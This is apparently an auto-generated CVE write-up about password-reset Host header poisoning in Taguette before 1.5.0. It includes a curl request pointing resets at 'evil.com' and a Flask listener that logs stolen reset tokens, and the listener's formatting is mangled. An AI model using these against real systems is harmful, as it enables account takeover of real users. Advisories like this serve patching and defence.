Listen to this Post
How the mentioned CVE works:
The vulnerability in Taguette is a password reset poisoning attack. The application generates password reset links by insecurely constructing a URL using the externally-provided `Host` header. An attacker can request a password reset for a victim’s account while supplying a malicious `Host` header pointing to a server they control. The application then uses this attacker-controlled hostname to build the reset link sent to the victim via email. If the victim clicks this link in the email, their browser is directed to the attacker’s server. During this interaction, the victim’s valid password reset token is exposed to the attacker in the HTTP referrer header or within the URL itself. The attacker can then use this intercepted token to reset the victim’s password and gain unauthorized access to their account.
DailyCVE Form:
Platform: Taguette
Version: <1.5.0
Vulnerability: Host Header Poisoning
Severity: High
date: 2024-10-20
Prediction: Patch available.
What Undercode Say:
curl -X POST http://<taguette-host>/reset -H "Host: evil.com" -d "[email protected]"
from flask import Flask, request
app = Flask(<strong>name</strong>)
@app.route('/reset/<token>')
def log_token(token):
print(f"Token captured: {token}")
return "404"
app.run(host='0.0.0.0', port=80)
How Exploit:
1. Attacker poisons reset link.
2. Victim clicks emailed link.
3. Token leaks to attacker.
4. Attacker hijacks account.
Protection from this CVE:
Upgrade to v1.5.0.
Avoid using `Host` header.
Use server-side URL building.
Impact:
Account takeover.
Unauthorized data access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
